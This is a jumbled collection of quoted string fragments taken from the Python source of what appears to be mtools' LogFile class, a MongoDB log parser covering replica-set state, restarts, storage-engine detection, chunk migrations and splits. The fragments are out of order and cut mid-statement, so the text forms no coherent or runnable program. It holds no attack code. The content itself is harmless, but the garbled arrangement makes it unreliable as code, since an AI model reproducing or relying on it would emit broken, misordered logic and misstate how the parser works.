"\"\"\" if \"[initandlisten] wiredtiger_open config:\" in line: self._storage_engine = 'wiredTiger'", "match: self._storage_engine = match.group('engine') else: self._storage_engine = 'mmapv1' \"\"\" For", "related information \"\"\" self._shards = [] self._chunks_moved_from = [] self._chunks_moved_to", "= filehandle.name == \"<stdin>\" self._bounds_calculated = False self._start = None", "potential year rollovers self._calculate_bounds() @property def start(self): \"\"\" Lazy evaluation", "of the datetime format.\"\"\" if self._year_rollover is None: self._calculate_bounds() return", "{ replSetInitiate:\" in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", '", "to find previous \" \"log line near offset %s in", "0 or v != versions[-1]: versions.append(v) return versions @property def", "rs_state = ' '.join(tokens[pos:]) state = (host, rs_state, LogEvent(line)) self._rs_state.append(state)", "not self._csrs: self._find_sharding_info() return self._csrs @property def chunks_moved_to(self): \"\"\"Lazily return", "note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent = LogEvent(line)", "+ 1, 1) # roll forward until we found a", "if restart: self._restarts.append((restart, logevent)) if \"starting :\" in line or", "])', line) if match: self._repl_set_members = match.group('replSetMembers') # if (\"is", "(if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set @property def", "log parsing offset) \\n%s\\n%s\\n\" % (curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context", "= None # make sure bounds are calculated before starting", "break # sanity check before attempting to find end date", "(logevent.thread == 'initandlisten' and \"db version v\" in logevent.line_str): self._binary", "namespace (?P<namespace>\\S+)' ' :: caused by :: (?P<error>\\S+): ', line)", "self._chunk_splits = [] prev_line = \"\" for line in self.filehandle:", "'wiredTiger' if \"command admin.$cmd command: { replSetInitiate:\" in line: match", "= 'mongod' elif logevent.thread == 'mongosMain' and ('MongoS' in logevent.line_str", "\\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)' ' :: caused by ::", "to find a valid log line within max_start_lines max_start_lines =", "line and # next(state for state in states if line.endswith(state))):", "current (or previous if prev=True) line in a log file", "'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return the number", "self._find_sharding_info() return self._csrs @property def chunks_moved_to(self): \"\"\"Lazily return the chunks", "return self._has_level @property def year_rollover(self): \"\"\"Lazy evaluation of the datetime", "options:\" in line: match = re.search('replSet: \"(?P<replSet>\\S+)\"', line) if match:", "= match.group('replSetMembers') # Replica set config logging in MongoDB 3.0+", "detection in _find_curr_line() self.prev_pos = None self._has_level = None #", "versions.append(v) return versions @property def repl_set(self): \"\"\"Return the replSet (if", "= None self._datetime_nextpos = None elif le.datetime: # gather new", "we found a line with a datetime try: logevent =", "if not self._filesize: self._calculate_bounds() return self._filesize @property def datetime_format(self): \"\"\"Lazy", "by :: (?P<error>\\S+): ', line) if match: time = logevent.datetime", "StopIteration: return states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING',", "= buff.decode(\"utf-8\", \"replace\") newline_pos = buff.rfind('\\n') if prev: newline_pos =", "self.next() while not logevent.datetime: logevent = self.next() return logevent except", "= match.group('namespace') # TODO: alter this to find moved from", "@property def timezone(self): \"\"\"Lazy evaluation of timezone of logfile.\"\"\" if", "import InputSource from mtools.util.logevent import LogEvent class LogFile(InputSource): \"\"\"Log file", "numSplits = 0 success = False time_taken = 0 error", "start and end of logfile. Returns None for stdin input", "path max_mark = self.filesize step_size = max_mark # check if", "datetime for line in self.filehandle: logevent = LogEvent(line) lines_checked +=", "= None steps = re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line)", "use readline here because next() iterator uses internal readahead #", "match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: shard_info =", "bytes): line = line.decode(\"utf-8\", \"replace\") if self.binary == \"mongos\": if", "match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: csrs_info =", "return logevent except StopIteration: # reached end of file return", "search for lower bound while abs(step_size) > 100: step_size =", "to this shard (if available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info() return", "in this shard (if available)\"\"\" if not self._chunk_splits: self._find_sharding_info() return", "year rollovers self._calculate_bounds() @property def start(self): \"\"\" Lazy evaluation of", "match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"',", "= None self._num_lines = None self._restarts = None self._binary =", "max_mark = self.filesize step_size = max_mark # check if start_dt", "elif \"splitVector\" in line: logevent = LogEvent(line) match = re.search('splitVector:", "would now tell us definitively that wiredTiger is being used", "_id: \"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+), ', line) if match: self._repl_set", "reached return else: # fast bisection path max_mark = self.filesize", "logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\" Fast-forward file to given", "time_taken = 0 error = None self._chunk_splits.append((time, split_range, namespace, numSplits,", "name.\"\"\" if not self._num_lines: self._iterate_lines() return self._hostname @property def port(self):", "None self._binary = None self._timezone = None self._hostname = None", "any level lines.\"\"\" if self._has_level is None: self._iterate_lines() return self._has_level", "future iterations start from the beginning if not self.from_stdin: self.filehandle.seek(0)", "logevent.line_str): self._binary = 'mongod' elif logevent.thread == 'mongosMain' and ('MongoS'", "of all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._restarts @property", "field So now we have to look for the \"[initandlisten]", "None self._has_level = None # make sure bounds are calculated", "line in self.filehandle: if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\")", "buff.decode(\"utf-8\", \"replace\") newline_pos = buff.rfind('\\n') if prev: newline_pos = buff[:newline_pos].rfind('\\n')", "readahead # buffer so seek position is wrong line =", "\"replace\") if (self._has_level is None and line[28:31].strip() in LogEvent.log_levels and", "> 100: step_size = ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le", "versions[-1]: versions.append(v) return versions @property def repl_set(self): \"\"\"Return the replSet", "@property def end(self): \"\"\" Lazy evaluation of start and end", "truly smaller line while self.filehandle.tell() >= 2 and (le.datetime is", "@property def chunk_splits(self): \"\"\"Lazily return the chunks split in this", "is None): raise SystemExit(\"Error: <%s> does not appear to be", "chunk_migration = (time, chunk_range, moved_from, namespace, steps, note, errmsg) self._chunks_moved_to.append(chunk_migration)", "to recalc bounds for lifetime of a Logfile object return", "datetime try: logevent = self.next() while not logevent.datetime: logevent =", "does not appear to be a supported \" \"MongoDB log", "fast for files. Streams need to be forwarded manually, and", "calculated before starting to iterate, # including potential year rollovers", "and WiredTiger \"\"\" if \"[initandlisten] options:\" in line: match =", "before attempting to find end date if (self._start is None):", "@property def binary(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if", "self.filehandle.readline() if isinstance(line, bytes): line = line.decode('utf-8', 'replace') if line", "match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line) if match: self._repl_set_protocol", "\"Starting new replica set monitor for\" in line: if \"[mongosMain]\"", "% (curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context + 1], hr), file=sys.stderr)", "!= versions[-1]: versions.append(v) return versions @property def repl_set(self): \"\"\"Return the", "_check_for_restart(self, logevent): if (logevent.thread == 'initandlisten' and \"db version v\"", "line) if match: csrs_info = (match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info", "None for stdin input currently. \"\"\" if not self._end: self._calculate_bounds()", "if prev and self.prev_pos is not None and self.prev_pos ==", "self._iterate_lines() return self._repl_set @property def repl_set_members(self): \"\"\"Return the replSet (if", "\"(?P<replSetMembers>\\S+)\", line) if match: csrs_info = (match.group('csrsName'), match.group('replSetMembers')) self._csrs =", "the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._hostname @property", "le def __iter__(self): \"\"\" Iterate over LogFile object. Return a", "step_size = abs(step_size) if not le: return # now walk", "= line.rstrip('\\n') le = LogEvent(line) # hint format and nextpos", "LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note:", "self._calculate_bounds() return self._year_rollover @property def num_lines(self): \"\"\" Lazy evaluation of", "iterate, # including potential year rollovers self._calculate_bounds() @property def start(self):", "self._iterate_lines() return self._hostname @property def port(self): \"\"\"Lazy evaluation of the", "self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily return the", "start date for stdin input if not self.start and self.from_stdin:", "to be a supported \" \"MongoDB log file format\" %", "the \"engine\" field So now we have to look for", "logevent = self.next() while not logevent.datetime: logevent = self.next() return", "\"Starting new replica set monitor for\" in line: match =", "None self._year_rollover = None self._shards = None self._csrs = None", "LogEvent(line) if logevent.datetime: self._end = logevent.datetime break # if there", "the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._port @property", "\"\"\"Lazily return the CSRS (if available)\"\"\" if not self._csrs: self._find_sharding_info()", "if not self._shards: self._find_sharding_info() return self._shards @property def csrs(self): \"\"\"Lazily", "# Replica set config logging in MongoDB 3.0+ new_config =", "if isinstance(buff, bytes): buff = buff.decode(\"utf-8\", \"replace\") newline_pos = buff.rfind('\\n')", "of characters to show before/after the log offset error_context =", "continue self._num_lines = ln + 1 # reset logfile self.filehandle.seek(0)", "\"log line near offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log", "le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not ret: # logevent indicates timestamp", "in self.restarts: if len(versions) == 0 or v != versions[-1]:", "options:\" no longer contains the \"engine\" field So now we", "self._start = None self._end = None self._filesize = None self._num_lines", "None self._datetime_format = None self._year_rollover = None self._shards = None", "forwarded manually, and it will miss the first line that", "available)\"\"\" if not self._chunk_splits: self._find_sharding_info() return self._chunk_splits def next(self): \"\"\"Get", "than first datetime self.filehandle.seek(0) le = self.next() if le.datetime and", "in self.filehandle: logevent = LogEvent(line) lines_checked += 1 if logevent.datetime:", "currently. \"\"\" if self.from_stdin: return None if not self._num_lines: self._iterate_lines()", "self.prev_pos == curr_pos: # Number of characters to show before/after", "log line within max_start_lines max_start_lines = 10 lines_checked = 0", "binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._hostname @property def", "set monitor for\" in line: if \"[mongosMain]\" in line: match", "else: # fast bisection path max_mark = self.filesize step_size =", "rollover and hint datetime format.\"\"\" # use readline here because", "self._start.replace(year=self._start.year - 1) self._year_rollover = self._end else: self._year_rollover = False", "logevent = LogEvent(line) if logevent.datetime: self._end = logevent.datetime break #", "isinstance(buff, bytes): buff = buff.decode(\"utf-8\", \"replace\") newline_pos = buff.rfind('\\n') if", "None self.filehandle.seek(0) # search for lower bound while abs(step_size) >", "if not self.start and self.from_stdin: if le and le.datetime: self._start", "Find the current (or previous if prev=True) line in a", "look for hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match:", "and self.prev_pos == curr_pos: # Number of characters to show", "if lines_checked > max_start_lines: break # sanity check before attempting", "= self._end else: self._year_rollover = False # reset logfile self.filehandle.seek(0)", "get start date for stdin input if not self.start and", "= None self._csrs = None self._chunks_moved_from = None self._chunks_moved_to =", "\"New replica set config in use\" in line: if \"configsvr:", "tokens[1].endswith(']'): pos = 4 else: pos = 5 host =", "self._repl_set = match.group('replSet') self._repl_set_version = match.group('replSetVersion') match = re.search(', protocolVersion:", "match.group('replSetMembers')) self._csrs = csrs_info else: match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\",", "match.group('port') \"\"\" For 3.0 the \"[initandlisten] options:\" long entry contained", "buff[error_context:error_context + 1], hr), file=sys.stderr) raise SystemExit(\"Cannot parse %s with", "if le.datetime and le.datetime >= start_dt: self.filehandle.seek(0) return le =", "abs(step_size) > 100: step_size = ceil(step_size / 2.) self.filehandle.seek(step_size, 1)", "self.filehandle.tell() >= 2 and (le.datetime is None or le.datetime >=", "shard (if available)\"\"\" if not self._chunk_splits: self._find_sharding_info() return self._chunk_splits def", "'mongod' elif logevent.thread == 'mongosMain' and ('MongoS' in logevent.line_str or", "datetime import datetime from math import ceil from mtools.util.input_source import", "@property def shards(self): \"\"\"Lazily return the shards (if available)\"\"\" if", "steps = None if match: errmsg = match.group('errmsg') else: errmsg", "state in states if line.endswith(state))): if \"is now in state\"", "from datetime import datetime from math import ceil from mtools.util.input_source", "find any sharding related information \"\"\" self._shards = [] self._chunks_moved_from", "should be able to find a valid log line within", "== -1: self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos - jump_back + 1,", "previous if prev=True) line in a log file based on", "self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"jumbo\" in", "it will miss the first line that would otherwise match", "match.group(\"range\") namespace = match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits = 0", "the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_version", "repl_set_version(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines()", "line.split() # 2.6 if tokens[1].endswith(']'): pos = 4 else: pos", "le.datetime: # gather new hint info from another logevent self._datetime_format", "match (as it consumes the log line). \"\"\" if self.from_stdin:", "need to recalc bounds for lifetime of a Logfile object", "def has_level(self): \"\"\"Lazy evaluation of the whether the logfile has", "match.group('replSet'), match.group('replSetMembers') ) if \"moveChunk.from\" in line: logevent = LogEvent(line)", "0 error = \"Jumbo\" self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken,", "engines, MMAPv1 and WiredTiger \"\"\" if \"[initandlisten] options:\" in line:", "success, time_taken, error)) elif \"Unable to auto-split chunk\" in line:", "= csrs_info else: match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if", "be a supported \" \"MongoDB log file format\" % self.filehandle.name)", "char jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back)", "{ (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match: time = logevent.datetime chunk_range", "line) if match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary", "return self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily return the chunks moved", "match: self._repl_set = match.group('replSet') self._repl_set_version = match.group('replSetVersion') match = re.search(',", "rollovers self._calculate_bounds() @property def start(self): \"\"\" Lazy evaluation of start", "= curr_pos if isinstance(buff, bytes): buff = buff.decode(\"utf-8\", \"replace\") newline_pos", "numSplits = match.group('numSplits') success = None time_taken = 0 error", "= True error = None self._chunk_splits.append((time, split_range, namespace, numSplits, success,", "if self.binary == \"mongos\": if \"Starting new replica set monitor", "numSplits, success, time_taken, error)) elif \"Unable to auto-split chunk\" in", "not self._filesize: self._calculate_bounds() return self._filesize @property def datetime_format(self): \"\"\"Lazy evaluation", "return self._year_rollover @property def num_lines(self): \"\"\" Lazy evaluation of the", "chunks moved to this shard (if available)\"\"\" if not self._chunks_moved_to:", "self._filesize: self._calculate_bounds() return self._filesize @property def datetime_format(self): \"\"\"Lazy evaluation of", "self._datetime_format = None self._year_rollover = None self._shards = None self._csrs", "= 5 host = tokens[pos] rs_state = tokens[-1] state =", "= [] self._chunk_splits = [] prev_line = \"\" for line", "offset) \\n%s\\n%s\\n\" % (curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context + 1],", "if new_config in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", '", "if (\"is now in state\" in line and # next(state", "we found a truly smaller line while self.filehandle.tell() >= 2", "for stdin input currently. \"\"\" if self.from_stdin: return None if", "self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line in reversed(self.filehandle.readlines()):", "(time, chunk_range, moved_to, namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\"", "from __future__ import print_function import os import re import sys", "self._num_lines: self._iterate_lines() return self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return the replSet", "return the CSRS (if available)\"\"\" if not self._csrs: self._find_sharding_info() return", "479 return # get start date for stdin input if", "def rs_state(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines:", "self._iterate_lines() return self._port @property def versions(self): \"\"\"Return all version changes.\"\"\"", "hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname =", "None self._repl_set_version = None self._repl_set_protocol = None self._storage_engine = None", "* 60 print(\"Fatal log parsing loop detected trying to find", "= re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: csrs_info = (match.group('csrsName'),", "'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return the number of", "in line and # next(state for state in states if", "available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_members @property def repl_set_version(self):", "line[31:39].strip() in LogEvent.log_components): self._has_level = True # find version string", "will miss the first line that would otherwise match (as", "= match.group('errmsg') chunk_migration = (time, chunk_range, moved_from, namespace, steps, note,", "Lazy evaluation of the number of lines. Returns None for", "self.binary == \"mongos\": if \"Starting new replica set monitor for\"", "logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') # TODO: alter", "for state in states if line.endswith(state))): if \"is now in", "split_range, namespace, numSplits, success, time_taken, error)) elif \"jumbo\" in line:", "one) self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for", "return self._timezone @property def filesize(self): \"\"\" Lazy evaluation of start", "datetime (lines are at most 10k, # go back 30k", "match: time = logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace')", "# invalidate hint info self._datetime_format = None self._datetime_nextpos = None", "namespace = match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits = 0 success", "self._start @property def end(self): \"\"\" Lazy evaluation of start and", "entry contained the \"engine\" field if WiredTiger was the storage", "time_taken = 0 error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits,", "' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if match: time = logevent.datetime", "time_taken = 0 error = \"Jumbo\" self._chunk_splits.append((time, split_range, namespace, numSplits,", "not self._end: self._calculate_bounds() return self._end @property def timezone(self): \"\"\"Lazy evaluation", "\"\"\"Lazy evaluation of the whether the logfile has any level", "[] for v, _ in self.restarts: if len(versions) == 0", "1) # roll forward until we found a line with", "state\" in line and # next(state for state in states", "of a Logfile object return if self.from_stdin: return False #", "success = None time_taken = 0 error = None self._chunk_splits.append((time,", "self._iterate_lines() return self._storage_engine @property def shards(self): \"\"\"Lazily return the shards", "match = re.search('replSet: \"(?P<replSet>\\S+)\"', line) if match: self._repl_set = match.group('replSet')", "start_dt: step_size = -abs(step_size) else: step_size = abs(step_size) if not", "find previous \" \"log line near offset %s in %s:\\n\\n%s\\n%s\\n\"", "= match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica set config logging", "self._datetime_format: self._calculate_bounds() return self._datetime_format @property def has_level(self): \"\"\"Lazy evaluation of", "None if not self._num_lines: self._iterate_lines() return self._num_lines @property def restarts(self):", "def csrs(self): \"\"\"Lazily return the CSRS (if available)\"\"\" if not", "\"Jumbo\" self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) prev_line =", "self._num_lines: self._iterate_lines() return self._storage_engine @property def shards(self): \"\"\"Lazily return the", "and it will miss the first line that would otherwise", "self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"splitVector\" in", "not self._num_lines: self._iterate_lines() return self._port @property def versions(self): \"\"\"Return all", "_iterate_lines(self): \"\"\"Count number of lines (can be expensive).\"\"\" self._num_lines =", "were only two engines, MMAPv1 and WiredTiger \"\"\" if \"[initandlisten]", "True def _find_curr_line(self, prev=False): \"\"\" Internal helper function. Find the", "to make sure we catch one) self.filehandle.seek(0, 2) self._filesize =", "if not self._num_lines: self._iterate_lines() return self._restarts @property def rs_state(self): \"\"\"Lazy", "manually, and it will miss the first line that would", "logfile self.filehandle.seek(0) self._bounds_calculated = True return True def _find_curr_line(self, prev=False):", "\"[initandlisten] wiredtiger_open config:\" in line: self._storage_engine = 'wiredTiger' if \"command", "yield le except StopIteration: return states = (['PRIMARY', 'SECONDARY', 'DOWN',", "filehandle): \"\"\"Provide logfile as open file stream or stdin.\"\"\" self.filehandle", "log file based on the current seek position. \"\"\" curr_pos", "is not None and self.prev_pos == curr_pos: # Number of", "most lines) if \"version\" in line[:100]: logevent = LogEvent(line) restart", "= match.group(\"range\") namespace = match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits =", "nextpos from previous line if self._datetime_format and self._datetime_nextpos is not", "self._calculate_bounds() return self._start @property def end(self): \"\"\" Lazy evaluation of", "if logevent.datetime: self._end = logevent.datetime break # if there was", "set monitor for\" in line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\",", "buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if prev and self.prev_pos is", "options:\" long entry contained the \"engine\" field if WiredTiger was", "_ in self.restarts: if len(versions) == 0 or v !=", "%s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset) \\n%s\\n%s\\n\" %", "0 success = False time_taken = 0 error = match.group(\"error\")", "format and nextpos from previous line if self._datetime_format and self._datetime_nextpos", "gather new hint info from another logevent self._datetime_format = le.datetime_format", "= None self._year_rollover = None self._shards = None self._csrs =", "this shard (if available)\"\"\" if not self._chunk_splits: self._find_sharding_info() return self._chunk_splits", "bytes): buff = buff.decode(\"utf-8\", \"replace\") newline_pos = buff.rfind('\\n') if prev:", "the logfile has any level lines.\"\"\" if self._has_level is None:", "(?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if match: time = logevent.datetime split_range", "given start_dt datetime obj using binary search. Only fast for", "if match: errmsg = match.group('errmsg') chunk_migration = (time, chunk_range, moved_from,", "self._chunks_moved_to = None self._chunk_splits = None # Track previous file", "= abs(step_size) if not le: return # now walk backwards", "= [] for v, _ in self.restarts: if len(versions) ==", "of raising StopIteration exception) per PEP 479 return # get", "position for loop detection in _find_curr_line() self.prev_pos = None self._has_level", "mtools.util.input_source import InputSource from mtools.util.logevent import LogEvent class LogFile(InputSource): \"\"\"Log", "moved_to, namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line:", "version: version = version.group(1) return version else: return False def", "if not self._num_lines: self._iterate_lines() return self._rs_state @property def binary(self): \"\"\"Lazy", "# Number of characters to show before/after the log offset", "self.filehandle.tell() # jump back 15k characters (at most) and find", "last newline char if newline_pos == -1: self.filehandle.seek(0) return self.next()", "in line: match = re.search('replSet: \"(?P<replSet>\\S+)\"', line) if match: self._repl_set", "errmsg = match.group('errmsg') else: errmsg = \"Unknown\" chunk_migration = (time,", "\"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match: time =", "self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if prev and self.prev_pos is not None", "log offset error_context = 300 self.filehandle.seek(-error_context, 1) buff = self.filehandle.read(curr_pos)", "LogEvent(line) if \"New replica set config in use\" in line:", "= ( match.group('replSet'), match.group('replSetMembers') ) if \"Starting new replica set", "def _find_sharding_info(self): \"\"\" Iterate over file and find any sharding", "start_dt datetime obj using binary search. Only fast for files.", "# use readline here because next() iterator uses internal readahead", "make sure we catch one) self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell()", "currently. \"\"\" if self.from_stdin: return None if not self._filesize: self._calculate_bounds()", "<%s> does not appear to be a supported \" \"MongoDB", "if \"configsvr: true\" in line: match = re.search(' _id: \"(?P<replSet>\\S+)\".*'", "newline_pos = buff[:newline_pos].rfind('\\n') # move back to last newline char", "if \"command admin.$cmd command: { replSetInitiate:\" in line: match =", "requested options\" % self.filehandle.name) else: self.prev_pos = curr_pos if isinstance(buff,", "self._chunks_moved_from = None self._chunks_moved_to = None self._chunk_splits = None #", "# fast bisection path max_mark = self.filesize step_size = max_mark", "a roll-over, subtract 1 year from start time if self._end", "wiredtiger_open config:\" in line: self._storage_engine = 'wiredTiger' if \"command admin.$cmd", "= LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match:", "match = re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line) steps =", "match: if self._csrs and match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers')", "CSRS (if available)\"\"\" if not self._csrs: self._find_sharding_info() return self._csrs @property", "num_lines(self): \"\"\" Lazy evaluation of the number of lines. Returns", "-1: self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos - jump_back + 1, 1)", "for year rollover and hint datetime format.\"\"\" # use readline", "level lines.\"\"\" if self._has_level is None: self._iterate_lines() return self._has_level @property", "line within max_start_lines max_start_lines = 10 lines_checked = 0 #", "LogEvent(line) # hint format and nextpos from previous line if", "self._year_rollover is None: self._calculate_bounds() return self._year_rollover @property def num_lines(self): \"\"\"", "the chunks moved from this shard (if available)\"\"\" if not", "the \"[initandlisten] options:\" long entry contained the \"engine\" field if", "Fast-forward file to given start_dt datetime obj using binary search.", "logevent = LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace", "the \"[initandlisten] wiredtiger_open config:\" which was present in 3.0, but", "note == \"success\": errmsg = None steps = re.findall('(?P<steps>step \\d", "LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line)", "line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+), ',", "\"(?P<replSetMembers>\\S+)\", line) if match: if self._csrs and match.group('replSet') != self._csrs[0]:", "to given start_dt datetime obj using binary search. Only fast", "time_taken, error)) elif \"jumbo\" in line: logevent = LogEvent(line) match", "chunks split in this shard (if available)\"\"\" if not self._chunk_splits:", "= match.group('range') namespace = match.group('namespace') # TODO: alter this to", "of log file, get end date if not self.end and", "== \"mongod\": logevent = LogEvent(line) if \"New replica set config", "success, time_taken, error)) prev_line = line # reset logfile self.filehandle.seek(0)", "version v\" in logevent.line_str): self._binary = 'mongod' elif logevent.thread ==", "So now we have to look for the \"[initandlisten] wiredtiger_open", "= LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)',", "with requested options\" % self.filehandle.name) else: self.prev_pos = curr_pos if", "Return a LogEvent object for each line (generator). \"\"\" le", "available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_version @property def repl_set_protocol(self):", "of all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._rs_state @property", "and self.from_stdin: if le and le.datetime: self._end = le.datetime #", "def __len__(self): \"\"\"Return the number of lines in a log", "in self.filehandle: if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if", "if WiredTiger was the storage engine. There were only two", "match = re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)' ' ::", "if match: if self._csrs and match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'),", "self._calculate_bounds() return self._datetime_format @property def has_level(self): \"\"\"Lazy evaluation of the", "= (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue self._num_lines = ln +", "state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue self._num_lines = ln", "\"\"\" if self.from_stdin: # skip lines until start_dt is reached", "to find end date if (self._start is None): raise SystemExit(\"Error:", "return if self.from_stdin: return False # we should be able", "a LogEvent object for each line (generator). \"\"\" le =", "self._hostname @property def port(self): \"\"\"Lazy evaluation of the binary name.\"\"\"", "if not self.from_stdin: self.filehandle.seek(0) # return (instead of raising StopIteration", "Iterate over LogFile object. Return a LogEvent object for each", "return self._restarts @property def rs_state(self): \"\"\"Lazy evaluation of all restarts.\"\"\"", "and end of logfile.\"\"\" if self._bounds_calculated: # Assume no need", "from mtools.util.logevent import LogEvent class LogFile(InputSource): \"\"\"Log file wrapper class.", "if \"[initandlisten] options:\" in line: match = re.search('replSet: \"(?P<replSet>\\S+)\"', line)", "line: tokens = line.split() if self._hostname: host = self._hostname +", "match.group('host') self._port = match.group('port') \"\"\" For 3.0 the \"[initandlisten] options:\"", "find version string (fast check to eliminate most lines) if", "self._timezone @property def filesize(self): \"\"\" Lazy evaluation of start and", "\"\"\"Lazy evaluation of the datetime format.\"\"\" if self._year_rollover is None:", "a log file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count number of", "None time_taken = 0 error = None self._chunk_splits.append((time, split_range, namespace,", "return self._num_lines @property def restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\"", "# get start datetime for line in self.filehandle: logevent =", "if not ret: # logevent indicates timestamp format has changed,", "None and line[28:31].strip() in LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level", "if self.from_stdin: # skip lines until start_dt is reached return", "= None self._repl_set_members = None self._repl_set_version = None self._repl_set_protocol =", "self._csrs @property def chunks_moved_to(self): \"\"\"Lazily return the chunks moved to", "if self.from_stdin: return None if not self._filesize: self._calculate_bounds() return self._filesize", "error)) elif \"jumbo\" in line: logevent = LogEvent(line) match =", "success = False time_taken = 0 error = \"Jumbo\" self._chunk_splits.append((time,", "of file return None def _find_sharding_info(self): \"\"\" Iterate over file", "and (le.datetime is None or le.datetime >= start_dt): self.filehandle.seek(-2, 1)", "hint datetime format.\"\"\" # use readline here because next() iterator", "0 success = False time_taken = 0 error = \"Jumbo\"", "LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] replSet\" in line: 